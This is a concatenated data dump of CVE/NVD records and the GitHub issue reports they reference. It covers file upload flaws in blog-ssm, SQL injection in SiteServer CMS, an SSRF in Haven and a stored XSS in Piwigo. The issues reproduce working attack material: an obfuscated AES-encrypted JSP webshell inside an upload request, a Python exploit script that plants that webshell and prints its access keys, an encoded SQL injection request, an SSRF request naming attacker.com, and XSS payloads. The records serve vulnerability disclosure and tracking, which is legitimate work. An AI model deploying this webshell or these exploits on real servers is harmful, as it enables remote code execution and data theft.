[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blog-ssm_project:blog-ssm:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C9AF1BCF-408B-4982-BA24-3A21EA825766", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/rawchen/blog-ssm/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rawchen", "blog-ssm" ]
## Unrestricted Upload of File with Dangerous Type In /uploadFileList #### [Suggested description] blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /uploadFileList. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file. #### [Vulnerability Type] Unrestricted Upload of File with Dangerous Type #### [Vendor of Product] https://github.com/rawchen/blog-ssm #### [Affected Product Code Base] 1.0 #### [Affected Component] blog-ssm 1.0 OS: Windows/Linux/macOS Browser: Chrome、Firefox、Safari #### [Attack Vector] ##### Step1:Registered account, username: text123, password: 123456. ![image-20220901151056903](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151056903.png) ##### Step2:Log in to the account you just registered and click "File Management". ![image-20220901151310085](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151310085.png) ![image-20220901151450938](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151450938.png) ##### Step3:Click File Upload, select the Trojan file that has been built in advance, and click Upload. ![image-20220901151725905](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151725905.png) ![image-20220901151844500](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151844500.png) ###### Data Pack ```bash POST /uploadFileList HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------352203683622881217472510347558 Content-Length: 2854 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/adminFile Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------352203683622881217472510347558 Content-Disposition: form-data; name="files[]"; filename="text.jsp" Content-Type: application/octet-stream <%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} %> -----------------------------352203683622881217472510347558-- ``` ##### Step4:In /file, click text.jsp to get the URL address of WebShell: http://localhost:8081/upload/file/text.jsp. ![image-20220901152330084](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901152330084.png) ![image-20220901152647804](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901152647804.png) ##### Step5:Connect to the Trojan via http://localhost:8081/upload/file/text.jsp. ![image-20220901153236077](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901153236077.png) ![image-20220901153318713](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901153318713.png) #### [Attack Type] Remote #### [Impact Code execution] True #### [Reference(s)] http://cwe.mitre.org/data/definitions/23.html
Unrestricted Upload of File with Dangerous Type In /uploadFileList
https://api.github.com/repos/rawchen/blog-ssm/issues/3/comments
0
2022-09-01T13:08:42Z
2022-09-01T13:08:42Z
https://github.com/rawchen/blog-ssm/issues/3
1,358,823,079
3
4,659
CVE-2022-40037
2023-01-26T21:16:04.740
An issue discovered in Rawchen blog-ssm v1.0 allows remote attacker to escalate privileges and execute arbitrary commands via the component /upFile.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:javaweb_blog_project:javaweb_blog:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "21D0CA03-C751-4E49-8639-19CE34B36471", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/rawchen/blog-ssm/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rawchen", "blog-ssm" ]
## Unrestricted Upload of File with Dangerous Type In /upFile #### [Suggested description] blog-ssm v1.0 was found to contain an arbitrary file upload vulnerability via the component /upFile. This vulnerability allows an attacker to escalate privileges and execute arbitrary commands through a crafted file. #### [Vulnerability Type] Unrestricted Upload of File with Dangerous Type #### [Vendor of Product] https://github.com/rawchen/blog-ssm #### [Affected Product Code Base] 1.0 #### [Affected Component] blog-ssm 1.0 OS: Windows/Linux/macOS Browser: Chrome、Firefox、Safari #### [Attack Vector] ##### Step1:After a code audit, it was found that /upFile has unauthorized access and arbitrary file uploads. ![image-20220901144733006](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901144733006.png) ##### Step2:Build EXP according to the code audit results, and run it to get the URL address of WebShell: http://localhost:8081/upload/blog/20220901/1662015136678.jsp ![image-20220901145545937](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901145545937.png) ###### EXP: ```python import requests # Configure the target URL. Host = "localhost:8081" Path = "upFile" Url = "http://{Host}/{Path}".format(Host=Host, Path=Path) # Configure Headers. Headers = {"sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"Windows\"", "Upgrade-Insecure-Requests": "1", "Origin": "http://{Host}".format(Host=Host), "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNOyNFd8trb922Qzd", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/104.0.0.0 Safari/537.36", "Connection": "close"} # Configure Data, where the WebShell key is KEY, the password is Pass, the payload is JavaDynamicPayload, # and the encryptor is JAVA_AES_BASE64. Data = "------WebKitFormBoundaryNOyNFd8trb922Qzd\r\nContent-Disposition: form-data; name=\"editormd-image-file\"; " \ "filename=\"text.jsp\"\r\n" \ "Content-Type: image/jpeg\r\n\r\n" \ "<%! String xc=\"3c6e0b8a9c15224a\"; String pass=\"pass\"; String md5=md5(pass+xc); class X extends " \ "ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, " \ "cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(" \ "\"AES\");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),\"AES\"));return c.doFinal(s); }catch " \ "(Exception e){return null; }} public static String md5(String s) {String ret = null;try {" \ "java.security.MessageDigest m;m = java.security.MessageDigest.getInstance(\"MD5\");m.update(s.getBytes(), 0, " \ "s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {" \ "}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = " \ "null;try {base64=Class.forName(\"java.util.Base64\");Object Encoder = base64.getMethod(\"getEncoder\", " \ "null).invoke(base64, null);value = (String)Encoder.getClass().getMethod(\"encodeToString\", new Class[] { " \ "byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName(" \ "\"sun.misc.BASE64Encoder\"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass(" \ ").getMethod(\"encode\", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception " \ "e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] " \ "value = null;try {base64=Class.forName(\"java.util.Base64\");Object decoder = base64.getMethod(" \ "\"getDecoder\", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod(\"decode\", " \ "new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { " \ "base64=Class.forName(\"sun.misc.BASE64Decoder\"); Object decoder = base64.newInstance(); value = (byte[" \ "])decoder.getClass().getMethod(\"decodeBuffer\", new Class[] { String.class }).invoke(decoder, new Object[] { " \ "bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(" \ "pass));data=x(data, false);if (session.getAttribute(\"payload\")==null){session.setAttribute(\"payload\"," \ "new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute(\"parameters\"," \ "data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((" \ "Class)session.getAttribute(\"payload\")).newInstance();f.equals(arrOut);f.equals(" \ "pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(" \ "base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (" \ "Exception e){}\r\n%>\r\n" \ "------WebKitFormBoundaryNOyNFd8trb922Qzd--\r\n" response = requests.post(Url, headers=Headers, data=Data) # Output WebShell address and connection information. Path = response.json()['url'] Url = "http://{Host}{Path}".format(Host=Host, Path=Path) print("Web_Shell_Url:{Url}".format(Url=Url)) print("Web_Shell_Key:{Key}".format(Key="key")) print("Web_Shell_Pass:{Pass}".format(Pass="pass")) print("Web_Shell_Payload:{Payload}".format(Payload="JavaDynamicPayload")) print("Web_Shell_Encryptor:{Encryptor}".format(Encryptor="JAVA_AES_BASE64")) ``` ##### Step3:Connect to the Trojan via http://localhost:8081/upload/blog/20220901/1662015136678.jsp. ![image-20220901145821537](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901145821537.png) ![image-20220901150013755](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901150013755.png) #### [Attack Type] Remote #### [Impact Code execution] True #### [Reference(s)] http://cwe.mitre.org/data/definitions/23.html
Unrestricted Upload of File with Dangerous Type In /upFile
https://api.github.com/repos/rawchen/blog-ssm/issues/2/comments
0
2022-09-01T13:07:37Z
2022-09-02T16:58:58Z
https://github.com/rawchen/blog-ssm/issues/2
1,358,821,337
2
4,660
CVE-2022-44297
2023-01-26T21:17:52.297
SiteServer CMS 7.1.3 has a SQL injection vulnerability the background.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/siteserver/cms/issues/3490" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/siteserver/cms/issues/3490" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sscms:siteserver_cms:7.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "4A886B48-6FEC-416B-B8E7-2AE79A6563E1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/siteserver/cms/issues/3490
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "siteserver", "cms" ]
this is Chaitin Security Research Lab find
background sql inject
https://api.github.com/repos/siteserver/cms/issues/3490/comments
4
2022-10-24T03:36:27Z
2023-01-11T10:11:26Z
https://github.com/siteserver/cms/issues/3490
1,420,156,265
3,490
4,661
CVE-2023-24060
2023-01-27T04:15:07.997
Haven 5d15944 allows Server-Side Request Forgery (SSRF) via the feed[url]= Feeds functionality. Authenticated users with the ability to create new RSS Feeds or add RSS Feeds can supply an arbitrary hostname (or even the hostname of the Haven server itself). NOTE: this product has significant usage but does not have numbered releases; ordinary end users may typically use the master branch.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havenweb/haven/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://havenweb.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havenweb/haven/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://havenweb.org/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:havenweb:haven:5d15944:*:*:*:*:*:*:*", "matchCriteriaId": "2347F1C7-DA3F-4D7B-AB9D-B5905B0EE15A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/havenweb/haven/issues/51
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "havenweb", "haven" ]
A Security Advisory has been raised for Haven v5d15944 (CVE-2023-24060): Description: Haven v5d15944 allows Server-Side Request Forgery (SSRF) via the Feeds functionality. Malicious authenticated users with the ability to create or add RSS Feeds to the website can supply an arbitrary host such as the host itself in an attempt to scan the internal network. Affected URL (Parameter): http://localhost:3000/feeds (url) ![image](https://user-images.githubusercontent.com/24572555/213958353-331df7df-811d-44e5-9181-92430c08fe84.png) Suggested Fix: Consider performing this action on the client-side. There's no need for the server to fetch the RSS feed, have the user's browser fetch the latest feed when loading the page. This would also remove the need to have a script that will execute every so often to update the RSS feed. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24060 https://nvd.nist.gov/vuln/detail/CVE-2023-24060 https://owasp.org/www-community/attacks/Server_Side_Request_Forgery https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html Payload: ``` POST /feeds HTTP/1.1 Host: localhost:3000 Content-Length: 203 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Cookie: _blog_session=[] Connection: close utf8=%E2%9C%93&authenticity_token=[]&feed%5Burl%5D=https%3A%2F%2Fattacker.com%2Frss&commit=Add+Feed ```
[Security] Haven v5d15944 Server-Side Request Forgery (SSRF) - CVE-2023-24060
https://api.github.com/repos/havenweb/haven/issues/51/comments
1
2023-01-23T02:34:10Z
2023-03-10T14:04:15Z
https://github.com/havenweb/haven/issues/51
1,552,416,898
51
4,662
CVE-2022-44298
2023-01-27T14:15:11.153
SiteServer CMS 7.1.3 is vulnerable to SQL Injection.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/siteserver/cms/issues/3492" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/siteserver/cms/issues/3492" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sscms:siteserver_cms:7.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "4A886B48-6FEC-416B-B8E7-2AE79A6563E1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/siteserver/cms/issues/3492
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "siteserver", "cms" ]
Vulnerability conditions SSCMS v7.1.3 +mysql+administrator privileges Vulnerability details 1. Discover the entry through code auditing SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs exists tablename SQL statement call <img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197457383-2098a373-d48d-4596-8cd2-9774687a9a31.png"> 2. Called the GetCount method of SSCMS.Core/Services/DatabaseManager.cs <img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197457421-a065c4a7-559e-4b03-bb19-749d7fea2b44.png"> 3. After entering the Quote method of SSCMS.Core/Services/DatabaseManager.Parser.cs <img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197457446-8647c65b-6aa3-4621-a3ef-8a1817a3389a.png"> 4、Call Database.cs(GetQuotedIdentifier)->DbUtils.cs(GetQuotedIdentifier)->MySqlImpl.cs(GetQuotedIdentifier) ​​in turn Finally, the returned result has not yet been filtered and other operations on the sql statement <img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197457489-c14cc4e7-fa13-4f61-9b84-991651e48c9a.png"> ` GET /api/admin/settings/sitesTables/1* HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Referer: http://192.168.3.129/utils/search.html?word=1111 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Connection: close ` poc in sqlmap <img width="426" alt="image" src="https://user-images.githubusercontent.com/49689234/197457601-50a9a0e8-1ae6-4610-850c-fa4b5b6216b4.png"> poc in burp `GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1 Host: 192.168.3.129 Accept: application/json, text/plain, */* Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Origin: http://192.168.3.129 Referer: http://192.168.3.129/ss-admin/?siteId=57 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ` <img width="432" alt="image" src="https://user-images.githubusercontent.com/49689234/197457677-081a27c4-44cf-4dd0-9222-a80f608fd4c9.png">
background admin sql inject
https://api.github.com/repos/siteserver/cms/issues/3492/comments
2
2022-10-24T05:59:29Z
2023-01-11T10:12:36Z
https://github.com/siteserver/cms/issues/3492
1,420,265,141
3,492
4,663
CVE-2022-48007
2023-01-27T18:15:14.947
A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1835" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1835" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "D4CE9B7C-3D2B-4876-B8E3-5EE46628EA5C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1835
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hello, I found Stored XSS in Piwigo version 13.4.0. **Impact:** In this way, ordinary users can be promoted to administrator users. **Here are the complete attack steps:** 1. Register an ordinary user. ![image](https://user-images.githubusercontent.com/71068573/208852813-4ff58926-0e8b-4940-bb4d-dcba99b4aeae.png) 2. Sign out. 3. POST messages with burpsuite, and change User-Agent's data to xss-payload. Here's an example. ``` POST /src/piwigo/identification.php HTTP/1.1 Host: 192.168.2.153 Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.2.153 Content-Type: application/x-www-form-urlencoded User-Agent: <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.2.153/src/piwigo/identification.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837 Connection: close username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4 ``` ![image](https://user-images.githubusercontent.com/71068573/208853591-ff2301ae-6106-43a6-9769-96b76208922b.png) 4. Finally, when the administrator user logs in and visit /admin.php?page=user_activity, the stored xss will be triggered. `/admin.php?page=user_activity` ![image](https://user-images.githubusercontent.com/71068573/208853661-115ae9c5-2256-4425-a480-6ce41706b66d.png) ![image](https://user-images.githubusercontent.com/71068573/208853690-abc73865-40e4-4b67-9a30-d2ce80efad5c.png) Please fix the vulnerability & let me know :). Thank You!
Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent
https://api.github.com/repos/Piwigo/Piwigo/issues/1835/comments
0
2022-12-21T08:21:08Z
2022-12-25T10:25:36Z
https://github.com/Piwigo/Piwigo/issues/1835
1,505,891,189
1,835
4,664
CVE-2022-48118
2023-01-27T20:15:14.867
Jorani v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Acronym parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/issues/379" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bbalet/jorani/issues/379" } ]
